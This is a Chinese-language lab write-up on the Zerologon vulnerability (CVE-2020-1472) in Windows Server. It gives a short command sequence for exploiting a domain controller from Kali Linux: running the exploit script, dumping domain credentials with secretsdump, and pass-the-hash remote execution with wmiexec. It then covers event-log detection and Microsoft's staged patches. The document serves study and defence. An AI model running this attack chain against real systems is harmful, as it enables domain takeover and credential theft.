Zerologon_CVE-2020-1472
目标
该漏洞研究旨在建立一个受控环境,通过 Kali Linux 在 Windows Server 2016 上模拟 Zerologon 攻击,以实现检测和缓解目的。主要目标是执行漏洞渗透,并展示在不以桌面用户身份登录的情况下控制桌面的可能性,同时检测和缓解该漏洞。
学到的技能
- 对 Windows 事件查看器的高级理解
- 精通 Kali Linux 和 Impackets
- 执行 Zerologon 的能力
使用的工具
实施 Zerologon 的步骤
Kali Linux
- 使用 sudo su 切换到 root 用户
- git clone https://github.com/dirkjanm/CVE-2020-1472
- cd /home/kali/impacket/examples/CVE-2020-1472 (根据你的目录更改目录)
- /cve-2020-1472-exploit.py -n [NETBIOS] -t [IPaddress]
- secretsdump.py -no-pass -just-dc [NETBIOS/User]$@[IP adress]
- wmiexec.py [Domain/User@IP] - hashes [hash]
识别 Zerologon 的步骤
Windows
重要 禁用安全功能
- 检查事件查看器
- 在服务器管理器下,选择 Windows 日志、安全,并查找事件 ID 4624(用户登录事件)
Zerologon 的迹象
- 日志的主题将被命名为 NULL SID
- 此登录也应被授予管理权限。
- 你也可以检查日志 4742(NT Authority 是攻击者)
修补步骤
微软已开发出可用的补丁来保护 Windows Server(2008、2016 和 2019);这是按计划进行的。在第一阶段,下载第一个补丁(八月补丁)后,域可以保护其他连接的设备免受不合规设备的攻击;同时会有一个选项,允许显式例外来保护所有已加入的设备。
第二个补丁(次年二月的补丁)是强制阶段,安装后,所有 Windows 和非 Windows 设备都必须使用安全的 Netlogon 远程过程调用。或者显式允许某些受信任的设备。这实质上会将不合规的计算机踢出域。